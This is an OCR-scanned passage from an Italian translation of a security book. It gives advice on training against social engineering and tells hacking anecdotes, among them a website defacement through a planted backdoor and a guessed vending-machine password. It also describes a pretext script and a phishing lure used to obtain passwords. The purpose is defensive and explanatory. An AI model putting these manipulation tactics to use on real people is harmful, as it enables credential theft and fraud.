alla vittima prescelta che l’accesso ai suoi file non sarà disponi- 
bile per un po’ di tempo e fa riferimento a un arco temporale del 
tutto inaccettabile: “Non potrai recuperare i tuoi file per le pros- 
sime due settimane, ma faremo tutto il possibile per essere certi 
che non andremo oltre”. Non appena la vittima entra in agita- 

, zione, l’autore dell’attacco si offre di aiutarla a recuperare i file 
più rapidamente; tutto ciò di cui c'è bisogno sono il nome uten- 
te e la password della persona. La quale, sollevata per aver tro- 
vato un modo per evitare la perdita paventata, di solito sarà ben 
lieta di obbedire. 

L'altra faccia della moneta si basa sull’uso del principio di 
scarsità per indurre la persona prescelta ad accaparrarsi un gua- 
dagno promesso. In una versione di questo tipo di attacco, le vit- 
time vengono attirate su un sito web da dove i loro dati di au- 
tenticazione della carta di credito possono essere rubati. Come 
reagireste di fronte a un'e-mail che promette un iPod della Apple 
nuovo di zecca per duecento dollari ai primi mille visitatori di un 
certo sito web? Andreste sul sito per registrarvi e acquistarne uno? 
E quando vi registrate con il vostro indirizzo di posta e scegliete 
una password, sceglierete la stessa password che usate altrove? 


Contromisure 


Per mitigare gli attacchi di social engineering è necessaria 
una serie di sforzi coordinati, tra cui vi suggeriamo di: 


e Sviluppare dei protocolli di sicurezza chiari e concisi che 
vengano applicati in modo coerente in tutta l’organizzazione. 

e Sviluppare dei corsi di formazione per accrescere la consa- 
pevolezza della sicurezza. 

e Sviluppare delle regole semplici che definiscano quali infor- 
mazioni sono sensibili. 

e Sviluppare una regola semplice che stabilisca che ogni vol- 
ta che qualcuno fa richiesta di un'azione ad accesso ristretto (va- 
le a dire di un'azione che comporta l'interazione con apparec- 
chiature informatiche le cui conseguenze non sono note) liden- 
tità del richiedente venga verificata in base ai regolamenti della 
compagnia. 

e Sviluppare un regolamento di classificazione dei dati. 

e Formare i dipendenti perché apprendano diversi modi per 
resistere agli attacchi di ingegneria sociale. 
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e Testare la suscettibilità dei dipendenti agli attacchi di social 
engineering realizzando una valutazione della sicurezza. 


L'aspetto più importante del piano richiede l’istituzione di 
protocolli di sicurezza appropriati e quindi la capacità di moti- 
vare i dipendenti ad aderire a tali protocolli. Seguono alcuni pun- 
ti fondamentali da prendere in considerazione quando si elabo- 
rano dei programmi e dei corsi di formazione per contrastare la 
minaccia del social engineering. 


Linee guida per la formazione 
Ecco alcune linee guida per la formazione del personale: 


. © Rendete i dipendenti consapevoli che gli ingegneri sociali at- 
taccheranno quasi certamente l'azienda a un certo punto, forse ri- 
petutamente. 

Potreste trovarvi di fronte a una mancanza di consapevolez- 
za generale che gli ingegneri sociali costituiscono una minaccia 
sostanziale; molti non sanno neanche che la minaccia esiste. Le 
persone in generale non si aspettano di essere manipolate e in- 
gannate, così vengono colte con la guardia abbassata da un at- 
tacco di ingegneria sociale. Molti utenti di Internet hanno rice- 
vuto un'e-mail proveniente apparentemente dalla Nigeria che 
chiede loro una mano per trasferire negli Stati Uniti una somma 
consistente di denaro. Per questo tipo di aiuto viene offerta una 
percentuale sulla cifra lorda. In seguito, vi viene richiesto di an- 
ticipare dei soldi per avviare il processo di trasferimento, e poi 
venite lasciati con un palmo di naso. Recentemente, una donna 
di New York è caduta nella trappola e ha “preso in prestito” cen- 
tinaia di migliaia di dollari dal suo datore di lavoro per anticipa- 
re la somma. Adesso, invece di trascorrere del tempo sul suo ya- 
cht nuovo, non ancora acquistato, si trova di fronte alla prospet- 
tiva di dividere un letto a castello in una struttura di detenzione 
federale. Le persone cadono veramente in questo tipo di attacchi 
di social engineering, altrimenti i truffatori nigeriani la smette- 
rebbero di spedire e-mail. 

e Usate i giochi di ruolo per dimostrare la vulnerabilità delle 
persone alle tecniche di social engineering e per educare i dipen- 
denti a sviluppare dei metodi di contrasto. 

La maggior parte delle persone vive e lavora nell’illusione del- 
l'invulnerabilità, immaginando di essere troppo intelligente per 
essere manipolata, ingannata, truffata o influenzata. Pensa che 
queste cose accadano solo agli “stupidi”. Esistono due metodi per 
aiutare i dipendenti a comprendere la propria vulnerabilità e a 


271 


convincersene veramente. Il primo consiste nel dimostrare l’effi- 
cacia del social engineering “bruciando” alcuni dipendenti pri- 
ma della loro partecipazione a un seminario sulla sicurezza dei 
dati, e poi fargli raccontare le loro esperienze in classe. Un altro 
approccio consiste nel dimostrare la vulnerabilità analizzando 
dei case studies reali di ingegneria sociale onde illustrare il mo- 
do in cui le persone si espongono a questi attacchi. In entrambi 
i casi, il corso di formazione dovrebbe esaminare i meccanismi 
dell’attacco, analizzando perché ha funzionato, per poi discute- 
re del modo in cui questi attacchi possono essere riconosciuti e 
contrastati. 

e Puntate a creare nelle persone formate la sensazione che si 
sentiranno stupide se verranno manipolate da un attacco di inge- 
gneria sociale dopo il corso. 

La formazione dovrebbe esaltare il senso di responsabilità di 
ciascun dipendente nel contribuire alla protezione della proprietà 
aziendale. Inoltre, è vitale che chi pianifica i corsi riconosca che 
la motivazione a seguire le procedure di sicurezza in determina- 
te circostanze nasce solo da una comprensione del perché tali 
procedure siano necessarie. Durante i corsi di formazione, gli 
istruttori dovrebbero offrire esempi del modo in cui i protocolli 
di sicurezza proteggono l'azienda, e dei danni che la compagnia 
potrebbe subire se le persone li ignorano o sono negligenti. 

È anche utile sottolineare che un attacco riuscito di ingegne- 
ria sociale può compromettere le informazioni personali del di- 
pendente e dei suoi colleghi all'interno dell'azienda. Un database 
aziendale dedicato alle risorse umane può contenere dati perso- 
nali che potrebbero essere di grande valore per i ladri d'identità. 

Ma il fattore più motivante potrebbe essere che a nessuno pia- 
ce essere manipolato, ingannato o truffato. Per questo, le perso- 
ne sono altamente motivate a non sentirsi stupide o stolte a cau- 
sa di una truffa. 


Programmi di contrasto al social engineering 


Seguono alcuni punti fondamentali da tenere in considera- 
zione quando si progettano i programmi: 


e Sviluppate delle procedure per le azioni che i dipendenti de- 
vono compiere quando riconoscono o sospettano un attacco di in- 
gegneria sociale. 

Rinviamo il lettore al manuale dettagliato di regolamenti di 
sicurezza fornito ne L'arte dell'inganno. Questi regolamenti do- 
vrebbero essere considerati un punto di riferimento; prendete ciò 
di cui avete bisogno e saltate il resto. Una volta che le procedure 
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della compagnia sono state sviluppate e applicate, le informazio- 
ni andrebbero pubblicate sulla rete interna dell'azienda, dove so- 
no rapidamente accessibili. Un’altra risorsa eccellente è il tratta- 
to di Charles Cresson Wood sullo sviluppo dei regolamenti sulla 
sicurezza informativa, Information Security Policies Made Easy. 

e Sviluppate delle linee guida semplici per i dipendenti che de- 
finiscano quali informazioni sono ritenute sensibili dall'azienda. 

Dal momento che il più delle volte elaboriamo le informa- 
zioni nella modalità euristica, si possono mettere a punto delle 
regole semplici di sicurezza che invitino a segnalare quando ven- 
gono fatte delle richieste che comportano l’uso di informazioni 
sensibili (per esempio la richiesta della password di una perso- 
na). Ogniqualvolta un dipendente si accorge che sono state ri- 
chieste delle informazioni sensibili o delle azioni informatiche, 
può far riferimento al manuale sulla sicurezza informativa pub- 
blicato su una pagina web della rete interna per verificare qual è 
il protocollo giusto e quali sono le procedure da seguire. 

Inoltre è importante capire e far capire ai dipendenti che an- 
che le informazioni che non vengono considerate sensibili po- 
trebbero tornare utili a un ingegnere sociale, che può collezio- 
nare frammenti di informazioni apparentemente inutili per unir- 
li e dare così l'impressione di essere credibile e affidabile. Il no- 
me di un coordinatore di un progetto aziendale riservato, la lo- 
cazione fisica di una squadra di sviluppatori, il nome del server 
usato da un dipendente qualsiasi, il nome di un progetto segre- 
to, sono tutte informazioni significative. Ogni azienda deve met- 
tere su un piatto della bilancia le necessità produttive e sull'altro 
le possibili minacce alla sicurezza. 

Questi sono solo alcuni dei molti esempi di informazioni ap- 
parentemente insignificanti che possono essere usate da un.at- 
taccante. Scenari come quelli descritti ne L'arte dell'inganno pos- 
sono tornare utili per far arrivare il concetto al personale in for- 
mazione. 

o Modificate le norme di buona educazione dell’organizzazio- 
ne. Si può anche dire no! 

La maggior parte di noi si sente strana o a disagio nel dire 
“no” agli altri. (Esiste ora un prodotto sul mercato concepito per 
persone che sono troppo gentili per riappendere la cornetta a co- 
loro che chiamano per le vendite di telemarketing. Quando rice- 
ve una di queste chiamate, l'utente preme il tasto * e riaggancia; 
quindi una voce dice a chi ha chiamato: “Mi scusi, qui parla il 
maggiordomo telefonico. Mi è stato ordinato di informarla che 
il proprietario di casa declina con dispiacere la sua richiesta”. 
Adoro il “con dispiacere”. Ma credo sia rivelatore che così tante 
persone abbiano bisogno di acquistare un apparecchio elettro- 
nico che dica no al posto loro. Voi spendereste cinquanta dolla- 
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ri per un apparecchio che vi risparmia “l'imbarazzo” di dire no?) 

Il programma di formazione aziendale sul social engineering 
dovrebbe avere tra i suoi obiettivi la ridefinizione della norma 
della gentilezza nella compagnia. Il nuovo atteggiamento do- 
vrebbe prevedere il gentile rifiuto di richieste di informazioni sen- 
sibili finché l'identità e l'autorizzazione del richiedente non sia- 
no state accertate. Per esempio, la formazione può comprende- 
re il suggerimento di risposte standard del tipo: “Come dipen- 
dente della compagnia X, sappiamo entrambi quant'è importan- 
te seguire i protocolli di sicurezza. Così, capiamo entrambi che 
io debba verificare la sua identità prima di dare seguito alla sua 
richiesta”. 

o Sviluppate delle procedure per verificare l’identità e l'auto- 
rizzazione. 

Ogni azienda deve mettere a punto un processo per verifica- 
re l'identità e l'autorizzazione delle persone che richiedono agli 
impiegati delle informazioni o di compiere delle azioni. Il pro- 
cesso di verifica in una qualsiasi situazione dipenderà necessa- 
riamente dal grado di riservatezza dell’informazione o dell’azio- 
ne richiesta. Come per molte altre questioni sul posto di lavoro, 
i bisogni di sicurezza devono essere bilanciati con le necessità 
operative dell’organizzazione. 

La formazione deve trattare non solo le tecniche ovvie ma an- 
che quelle più sottili, come l’uso di un biglietto da visita da par- 
te di Whurley per affermare le sue credenziali. (Ricordate il per- 
sonaggio principale interpretato da James Garner nella serie te- 
levisiva poliziesca degli anni novanta Agenzia Rockford Files, il 
quale teneva una piccola stampante nella sua macchina in mo- 
do da poter stampare il biglietto da visita più appropriato per 
ogni occasione.) 

Abbiamo fornito un suggerimento per la procedura di verifi- 
ca ne L'arte dell'inganno. 

o Fate sì che i dirigenti di alto livello vengano coinvolti. 

Questo, naturalmente, è quasi un cliché: qualsiasi sforzo si- 
gnificativo di gestione inizia con la consapevolezza che il pro- 
gramma ha bisogno del sostegno della dirigenza per andare in 
porto. Forse ci sono alcuni impegni aziendali in cui questo so- 
stegno è più importante che per la sicurezza, la cui funzione di- 
viene sempre più vitale, ma che contribuisce poco ad aumenta- 
re gli introiti dell'azienda e così spesso finisce in secondo piano. 

Eppure questo dato rende solo più importante che l'impegno 
per la sicurezza parta dall’alto. 

Su un argomento correlato, i dirigenti di alto livello dovreb- 
bero mandare due messaggi chiari su questa materia. Ai dipen- 
denti non verrà mai chiesto da parte della dirigenza di aggirare 
alcun protocollo di sicurezza. E nessun dipendente finirà nei guai 
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per aver rispettato i protocolli di sicurezza, anche se un manager 
gli dicesse di violarli. ; 


Una nota più leggera: incontrate i manipolatori 
nella vostra famiglia, i vostri figli 


Molti bambini (o la maggior parte?) hanno delle capacità di 
manipolazione incredibilmente alte — molto simili a quelle usate 
dagli ingegneri sociali — che perdono nella maggior parte dei ca- 
si quando crescono e diventano più socievoli. Ogni genitore è sta- 
to l’obiettivo dell'attacco di un figlio. Quando un ragazzino o una 
ragazzina vogliono veramente qualcosa possono diventare così 
martellanti da risultare fastidiosi, ma questo è anche divertente. 

Mentre Bill e io stavamo finendo questo libro, fui testimone 
di un attacco di social engineering portato a fondo da una bam- 
bina. La mia compagna Darci e sua figlia di nove anni Briannah 
mi avevano raggiunto a Las Vegas. In albergo, l’ultimo giorno pri- 
ma di prendere un volo notturno, Briannah sondò la pazienza di 
sua madre chiedendole di andare a un ristorante che lei aveva 
scelto per cena, e diede vita a un tipico accesso d'ira infantile. 
Darci applicò la punizione temperata di sequestrarle tempora- 
neamente il Game Boy dicendole che non avrebbe potuto usare 
i suoi giochi elettronici per un giorno. 

Briannah sembro accettare la punizione per un po’, e poi, po- 
co a poco, iniziò a tentare diversi modi per convincere la madre a 
restituirle i suoi giochi, e lo stava ancora facendo quando tornai e 
mi unii a loro. Il tormento continuo della ragazzina era fastidio- 
so; a un certo punto realizzammo che stava cercando di applica- 
re l'ingegneria sociale con noi e iniziammo a prendere appunti: 


e “Mi annoio. Posso riavere per favore i miei giochi.” (Con un 
tono di pretesa, non di domanda.) 

e “Vi farò impazzire se non posso giocare.” (Accompagnato 
da un lamento.) 

e “Non avrò niente da fare sull’aereo senza i miei giochi.” (Det- 
to con un tono del tipo: “Persino un idiota lo capirebbe”.) 

e “Andrebbe bene se potessi fare solo una partita, vero!?” (Una 
promessa dissimulata nella forma di una domanda.) 

e “Sarebbe una cosa buona se mi restituiste i miei giochi.” (Il 
massimo della sincerità.) 

e “La notte scorsa sono stata così brava, perché non posso fa- 
re una partita ora?” (Un tentativo disperato basato su un modo 
di argomentare torbido.) 

e “Non lo farò mai più. (Pausa) Posso fare una partita ades- 
so?” (“Non lo farò mai più,” ma quanto crede che siamo fessi?) 
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e “Posso riaverlo adesso, per favore?” (Se le promesse non fun- 
zionano, forse implorare un po’ servirà a qualcosa...) 

e “Devo tornare a scuola domani, così non potrò giocare ai 
miei giochi se non lo faccio ora.” (Dunque, quante forme diffe- 
renti di ingegneria sociale sono contenute in questa frase? Forse 
avrebbe dovuto contribuire alla stesura di questo libro.) 

e “Mi dispiace e avevo torto. Posso giocare solo per un po- 
chino?” (La confessione potrebbe essere buona per l’anima, ma 
potrebbe non funzionare molto come forma di manipolazione.) 

e “Kevin me l’ha fatto fare.” (Pensai che solo gli hacker lo di- 
cessero!) 

e “Sono veramente triste senza il mio gioco.” (Se nient'altro 
funziona, cerca un po’ di comprensione.) 

e “Sono stata più di mezza giornata senza il mio gioco.” (In 
altre parole, “quante sofferenze devo patire?”) 

e “Non costa niente giocare.” (Un tentativo disperato di in- 
dovinare quali potrebbero essere le ragioni della mamma per pro- 
lungare la punizione così a lungo. Tentativo fallito.) 

e “È il fine settimana del mio compleanno e non posso gio- 
care con i miei giochi.” (Un altro tentativo di impietosire per ot- 
tenere comprensione.) 

E continuando mentre ci preparavamo per andare all’aero- 
porto: 

e “Mi annoierò all'aeroporto.” (Nella vana speranza che la 
noia venga considerata una cosa spaventosa da evitare a tutti i 
costi. Forse se Briannah si fosse annoiata abbastanza, avrebbe 
provato a disegnare o a leggere un libro.) 

e “E un volo di tre ore e non avrò niente da fare!” (Ancora una 
speranza che possa mollare e aprire il libro cui ha fatto cambia- 
re aria.) 

e “E troppo buio per leggere e troppo buio per disegnare. Se 
gioco posso vedere lo schermo.” (Il vano tentativo reso logico.) 

e “Posso almeno usare Internet?” (Deve pur esserci un posto 
per un qualche compromesso nel tuo cuore). _ 

e “Sei la mamma migliore del mondo!” (È anche capace di 
usare i complimenti e l’adulazione nel flebile tentativo di ottene- 
re quello che vuole.) 

e “Non è giusto!!!” (L'ultimo tentativo, da ultima spiaggia.) 


Se volete migliorare la vostra comprensione di come gli in- 
gegneri sociali manipolano i loro bersagli e come fanno passare 
le persone da una condizione pensante a una emotiva... ascolta- 
te semplicemente i vostri figli. 
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Conclusioni 


Nel nostro primo libro scritto a quattro mani, Bill Simon e io 
definimmo l'ingegneria sociale “Vanello più debole della sicurez- 
za delle informazioni”. 

Tre anni dopo, che cosa scopriamo? Scopriamo che sempre 
più aziende impiegano le tecnologie di sicurezza per proteggere 
le proprie risorse informatiche dall’intrusione tecnica da parte di 
hacker o di spie industriali assoldate, e mantengono un'efficien- 
te forza di sicurezza fisica per proteggersi dagli ingressi non au- 
torizzati. 

Ma scopriamo anche che si dedica una scarsa attenzione al 
contrasto delle minacce poste dagli ingegneri sociali. E fonda- 
. mentale educare e formare i dipendenti su questa minaccia e su 
come proteggersi dall’essere indotti con l'inganno ad aiutare gli 
intrusi. La sfida del difendersi dai punti deboli dell'essere uma- 
no è sostanziale. Proteggere la propria organizzazione dal cade- 
re vittima di hacker che usano le tecniche di ingegneria sociale 
deve essere la responsabilità di ogni dipendente: ogni dipenden- 
te, compresi quelli che non usano i computer per svolgere le pro- 
prie mansioni. I dirigenti sono vulnerabili, le persone in contat- 
to con il mondo esterno sono vulnerabili, gli operatori dei cen- 
tralini, delle reception, delle pulizie, gli attendenti dei garage, e 
soprattutto i nuovi dipendenti. Tutti possono essere sfruttati da- 
gli ingegneri sociali per fare un altro passo verso il raggiungi- 
mento dei loro obiettivi illeciti. 

L'elemento umano si è dimostrato da sempre l’anello più de- 
bole. La domanda da un milione di dollari è: sarete voi l'anello 
debole della vostra azienda che viene attaccato da un ingegnere 
sociale? 
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11. 
Storie brevi 


Non sono un esperto di crittografia e nemmeno 

un matematico. Semplicemente so come le per- 

sone commettono errori nelle applicazioni, e so 
che ripetono gli stessi errori in continuazione. 

Un ex hacker diventato consulente 

sulla sicurezza 


Alcune delle storie che ci sono state raccontate durante la ste- 
sura di questo libro non hanno trovato un loro spazio definito in 
nessuno dei precedenti capitoli, ma sono troppo divertenti per tra- 
lasciarle. Non tutte sono storie di hacking. Alcune sono soltanto del- 
le bravate, altre si basano sull’inganno, altre ancora sono degne di 
essere raccontate perché illuminanti o rivelatrici di alcuni aspetti 
della natura umana. Alcune sono semplicemente divertimenti. 

A noi sono piaciute e abbiamo pensato che potrebbero pia- 
cere anche a voi. 


2 i 
L'assegno mancante 


Jim era un sergente dell'esercito degli Stati Uniti e lavorava 
in un gruppo informatico a Fort Lewis nei pressi di Puget Sound, 
nello stato di Washington, agli ordini di un capo sergente dispo- 
tico. Jim lo descrive come “semplicemente imbufalito con il mon- 
do”, il tipo di persona che “usa il suo grado per far sentire dei mi- 
serabili tutti quelli di grado inferiore”. Alla fine, Jim e gli altri 
amici del gruppo ne ebbero abbastanza e decisero che avrebbe- 
ro trovato un modo di punire il bruto che rendeva la loro vita in- 
sopportabile. 

La loro unità gestiva l'archivio del personale e il registro del- 
le buste paga. Per garantire che i calcoli fossero precisi, ogni vo- 
ce del registro veniva compilata da due soldati-impiegati; i risul- 
tati venivano poi confrontati, prima che i dati fossero inseriti nel- 
la scheda di ogni persona. 

Secondo Jim, il modo di vendicarsi che avevano elaborato 
nonera poi così complicato. Due impiegati compilarono due sche- 
de identiche che dicevano al computer che il sergente era morto. 
Tutto ciò ovviamente bloccò il suo stipendio. 
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Quando arrivò il giorno di paga, il sergente si lamentò di non 
aver ricevuto il suo assegno: “Le procedure standard volevano 
che si tirasse fuori la sua scheda cartacea e che il suo assegno fos- 
se compilato a mano”, racconta Jim. Ma neanche questo fun- 
zionò: “Per qualche ragione misteriosa”, scrive Jim senza rispar- 
miare l'ironia, “la sua scheda cartacea non si trovava da nessuna 
parte. Ho ragione di credere che la scheda fu vittima di una com- 
bustione spontanea”. Non è difficile immaginare come Jim sia 
potuto arrivare a questa conclusione. 

Con il computer che indicava il decesso dell’uomo e senza nes- 
sun registro fisico a portata di mano che dimostrasse il contrario, 
al sergente non rimanevano molte speranze. Non esisteva nessu- 
na procedura per emettere un assegno a una persona che non esi- 
steva. Era necessario fare una domanda al comando dell'esercito 
richiedendo che venissero copiati e inviati i duplicati dei docu- 
menti contenuti nella sua scheda personale, oltre alle istruzioni sul 
pagamento. La domanda fu presentata prontamente, ma con po- 
che speranze di ottenere una risposta in tempi brevi. 

La storia ha un esito positivo. Jim ci dice che “per il resto del 
tempo che ebbi a che fare con lui, il suo comportamento risultò 
assai diverso”. 


Vieni a Hollywood, giovane mago 


All'epoca dell'uscita del filmJurassic Park 2, un giovane hacker 
che chiameremo Yuki decise che voleva “possedere” — un modo 
di dire degli hacker per assumere il controllo — il computer della 
Mca/Universal Studios che ospitava lost-world.com, il sito del 
film e degli show televisivi di quella casa di produzione. 

Si trattava, racconta, di “un hack piuttosto banale” perché il 
sito era davvero poco protetto. Se ne approfittò con un metodo 
che, in linguaggio tecnico, Yuki descrive come “inserimento di 
un Cgi che attivava un bouncer (una porta molto alta non bloc- 
cata dal firewall), in modo da potermi collegare a quella porta e 
poi di nuovo alla mia macchina locale (localhost) per ottenere un 
accesso illimitato”. 

La Mcasi trovava all’epoca in un edificio nuovo di zecca. Yuki 
fece una breve ricerca su Internet, scoprì il nome dell'impresa 
che lo aveva progettato, andò sul loro sito e non incontrò grosse 
difficoltà a entrare nella loro rete interna. (Ciò è avvenuto pa- 
recchio tempo fa, per cui si presume che nel frattempo le vulne- 
rabilità più ovvie siano state riparate.) 

Da dietro il firewall non gli ci volle molto a reperire i proget- 
ti in AutoCad dell’edificio dell’Mca. Yuki era al settimo cielo. Tut- 

tavia questo non era che un aspetto secondario rispetto al suo 
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obiettivo principale. Un suo amico aveva lavorato su “un nuovo 
logo, veramente carino” per il sito di Jurassic Park, in cui scom- 
pariva il nome Jurassic Park e il tirannosauro con le fauci spa- 
lancate veniva sostituito da una piccola papera. Entrarono nel si- 
to, pubblicarono il loro logo al posto di quello ufficiale e si riti- 
rarono per vedere cosa sarebbe successo. 

La reazione non fu proprio quella che si aspettavano. I me- 
dia trovarono il logo divertente ma sospetto. CNet News.com pub- 
blicò un articolo! il cui titolo si chiedeva se si trattava di un hack 
o di uno scherzo, sospettando che qualcuno alla Universal po- 
tesse aver messo in piedi questa trovata per fare pubblicità al film. 

Yuki racconta che poco dopo si mise in contatto con la Uni- 
versal, dando spiegazioni sul buco nella sicurezza che lui e il suo 
amico avevano usato per entrare nel sito, avvisandoli anche del- 
la backdoor che avevano installato. A differenza di molte orga- 
nizzazioni che vengono a conoscenza dell'identità di un intruso- 
re, alla Universal furono grati per le informazioni ricevute. 

Non solo, afferma Yuki, gli offrirono anche un lavoro, pen- 
sando senz'altro che li avrebbe aiutati a scoprire e risolvere altre 
vulnerabilità. Yuki era elettrizzato dall’offerta. 

Tuttavia la cosa non andò in porto: “Quando scoprirono che 
avevo solo sedici anni cercarono di offrirmi di meno”. Rinunciò 
all'’opportunità. 

Due anni dopo CNet News.com presentò una lista di quelli 
che per loro erano i dieci migliori hack di tutti i tempi.? Yuki fu 
orgoglioso di vedere che il suo Jurassic Pond? era stato inserito 
in una buona posizione. A 

Ma il suo periodo hacker è ormai finito, racconta Yuki. E ri- 
masto “fuori dalla scena per cinque anni ormai”. Dopo aver ri- 
fiutato l'offerta della Mca, cominciò una carriera da consulente 
che continua tutt'oggi. 


Hackerare un distributore di bibite 


Qualche tempo fa la Xerox e altre compagnie sperimentaro- 
no delle macchine che avrebbero emesso un suono del tipo “E.T. 
telefono casa”. Una fotocopiatrice, per esempio, monitorava il 
proprio stato e quando l'inchiostro era sul punto di esaurirsi o i 
rulli di trasporto della carta iniziavano a consumarsi o si mani- 


! CNet News.com, Lost World, Lapd: Hacks or hoaxes? di Janet Kornblum, 30 
maggio 1997. 

2 CNet News.com, The Ten Most Subversive hacks, di Matt Lake, 27 ottobre 
1999. 

3 “Stagno del Giurassico.” Gioco di parole con il titolo originale. [N.d.T.] 
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festava qualche problema di altro tipo, la macchina faceva par- 
tire un segnale diretto a qualche centralina a distanza o al quar- 
tier.generale dell’impresa per avvisare della situazione. A quel 
punto sarebbe arrivato un tecnico a portare i pezzi di ricambio 
richiesti. 

Secondo una delle nostre fonti, David, una delle aziende che 
sondarono il terreno fu la Coca-Cola. I distributori sperimentali 
di Coca, racconta David, erano collegati a un sistema Unix e po- 
tevano essere interrogati a distanza per ottenere un rapporto sul 
loro funzionamento. 

In preda alla noia, David e un paio di amici un giorno deci- 
sero di mettere alla prova il sistema e vedere quello che avreb- 
bero potuto scoprire. Videro che, come previsto, alla macchina 
si poteva accedere via Telnet. “Era collegata tramite una porta se- 
riale e aveva attivo un processo che raccoglieva i dati sul suo sta- 
to e li restituiva ben formattati.” Usarono il programma Finger e 
appresero che “era stato fatto un login su quell’account: tutto 
quello che ci restava da fare era trovare la password”. 

Gli ci vollero solo tre tentativi per scoprire la password, an- 
che se uno dei programmatori dell’azienda ne aveva scelta una 
altamente improbabile. Una volta entrati, scoprirono che il co- 
dice sorgente del programma era contenuto nella macchina stes- 
sa e “non potemmo trattenerci dal fare una piccola modifica!”. 

Inserirono alcune stringhe di codice: così facendo, più o me- 
no una volta su cinque, si sarebbe aggiunta una riga alla fine del 
messaggio del distributore che recitava: “Aiuto! Mi stanno pren- 
dendo a calci!”. 

“Comunque le più grosse risate,” racconta David, “ce le sia- 
mo fatte quando abbiamo scoperto la password.” Provate a in- 
dovinare qual era la password che per il personale della Coca-Co- 
la nessuno avrebbe mai dovuto indovinare. 

La password del distributore, secondo David, era “Pepsi”! 


Mettere in ginocchio l'esercito iracheno 
durante l'operazione “Desert Storm” 


Nelle fasi preparatorie dell'operazione “Tempesta nel deser- 
to”, l’intellisence dell'esercito americano si mise a lavorare sul si- 
stema di comunicazioni dell'esercito iracheno, inviando in mis- 
sione elicotteri equipaggiati con strumenti di rilevamento delle 
radiofrequenze su alcuni punti strategici lungo “il lato sicuro del 
confine iracheno”. Questa è la descrizione che ne fa Mike, che si 
trovava lì. 


281 


Gli elicotteri venivano mandati a gruppi di tre. Prima dell’evoluzio- 
ne del Servizio di posizionamento globale (Gps), pensato per defi- 
nire le coordinate esatte di una posizione, i tre elicotteri fornivano 
dati di posizionamento incrociati, permettendo all’intelligence di in- 
dividuare la posizione di tutte le unità dell'esercito iracheno, insie- 
me alle radiofrequenze che stavano usando. 


Una volta iniziata l'operazione, gli Stati Uniti furono in gra- 
do di intercettare le comunicazioni irachene. Racconta Mike che 
“i soldati americani che parlavano il Farsi cominciarono ad ascol- 
tare i comandanti iracheni che comunicavano con i comandan- 
ti delle pattuglie di terra”. E non si limitavano ad ascoltare. Quan- 
do un comandante chiedeva a tutte le unità di collegarsi simul- 
taneamente, le varie unità si identificavano così: “Qui Cammel- 
lo 1”, “Qui Cammello 3”, “Qui Cammello 5”. Uno degli intercet- 
tatori americani allora si intrometteva in Farsi: “Qui Cammello 
1”, ripetendo l’identificazione. 

Il comandante iracheno, confuso, diceva a Cammello 1 che 
si era già identificato e che non doveva farlo due volte. Cammel- 
lo 1 rispondeva innocente che l’aveva fatto una sola volta. “Si sca- 
tenava una raffica di discussioni, con supposizioni e smentite su 
chi aveva detto cosa,” ricorda Mike. 

Gli intercettatori dell'esercito seguirono lo stesso schema con 
diversi comandanti iracheni su e giù per la linea di confine, fin- 
ché non decisero di portare la strategia al livello successivo. An- 
ziché ripetere un nome di identificazione, una voce americana in 
inglese gridava: “Qui Bravo Force 5: come va da quelle parti?”. 
Secondo Mike, “a quel punto si scatenava un tumulto!”. 

Queste interruzioni infuriavano i comandanti, che dovevano 
sentirsi a un tempo mortificati nel sapere che le loro truppe sul 
campo ascoltavano le interruzioni degli invasori infedeli, e scioc- 
cati nello scoprire di non poter mandare ordini via radio alle lo- 
ro unità senza che le forze americane ascoltassero ogni parola. 
Cominciarono a passare regolarmente da una frequenza all'altra 
attraverso un elenco di frequenze di scorta. 

Le apparecchiature di rilevamento delle radiofrequenze de- 
gli elicotteri dell'esercito americano erano progettate per scon- 
figgere anche questa strategia. Gli strumenti scansionavano lo 
spettro radio e individuavano rapidamente la frequenza su cui 
erano passati gli iracheni. I soldati in ascolto dell'esercito ame- 
ricano ritrovavano in fretta la pista giusta. Allo stesso tempo, do- 
po ogni cambio di frequenza l'intelligence poteva aggiungere una 
nuova voce all'elenco sempre più lungo delle frequenze utilizza- 
te dagli iracheni. Continuavano così a raccogliere e definire in 
modo sempre più preciso “ordine di battaglia” della forza di di- 
fesa irachena: la dimensione, la posizione e la funzione delle va- 
rie unità, e persino i piani di azione. 
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Alla fine il comando iracheno perse ogni speranza e chiuse la 
comunicazione radio con le proprie truppe, adottando le linee te- 
lefoniche interrate. Ma ancora una volta gli Stati Uniti furono al- 
le costole. L'esercito iracheno si stava affidando a vecchie e sem- 
plici linee telefoniche seriali e fu un gioco da ragazzi mettere sot- 
to controllo una di queste linee con un trasmettitore crittato e 
inoltrare tutto il traffico all’intelligence. 

I soldati americani che parlavano Farsi si rimisero al lavoro, 
usando gli stessi metodi che avevano adoperato per sabotare le 
comunicazioni radio. E divertente immaginare l’espressione sul- 
la faccia di un maggiore, di un colonnello o di un generale ira- 
cheno mentre nella linea rimbombava una voce gioviale che di- 
ceva: “Salve, qui è di nuovo Bravo Force 5. Come va da quelle 
parti?”. Magari aggiungendo qualcosa come: “Ci siete mancati 
per un po’, è bello essere di nuovo tra voi”. 

A quel punto il comando iracheno non aveva più modo di co- 
municare con strumenti moderni. Dovettero ricorrere alla tra- 
scrizione degli ordini su carta e all’invio sul campo tramite dei 
camion. Gli ufficiali scrivevano a loro volta le risposte e rispedi- 
vano i camion al quartier generale attraverso il deserto sabbioso 
e bollente. Così, un solo scambio di messaggi poteva impiegare 
ore per compiere il tragitto di andata e ritorno. Gli ordini che ri- 
chiedevano l’azione coordinata di varie unità divennero pratica- 
mente impossibili. Non si riusciva a farli arrivare sul campo in 
tempo perché le truppe potessero agire di concerto. 

Non era esattamente il modo più efficace per difendersi con- 
tro le rapide forze americane. 

Appena cominciarono i bombardamenti, a un gruppo di pi- 
loti fu assegnato il compito di cercare i camion che trasportava- 
no i messaggi tra le posizioni conosciute delle unità irachene. La- 
viazione cominciò a prendere di mira questi camion per le co- 
municazioni e a metterli fuori uso. Nel giro di pochi giorni, gli 
autisti iracheni iniziarono a rifiutarsi di trasportare i messaggi 
fra i comandanti: sapevano di non avere possibilità di salvarsi. 

Questo significava il crollo pressoché assoluto del sistema di 
comando e controllo iracheno. Anche quando il comando cen- 
trale iracheno riusciva a far arrivare gli ordini via radio sul cam- 
po, dice Mike, i comandanti “erano terrorizzati perché sapevano 
che i messaggi venivano ascoltati dall'esercito americano e sa- 
rebbero stati usati per attaccare le loro postazioni”. Soprattutto 
perché, rispondendo agli ordini, il comandante rivelava di esse- 
re ancora vivo e si aspettava che la sua risposta permettesse agli 
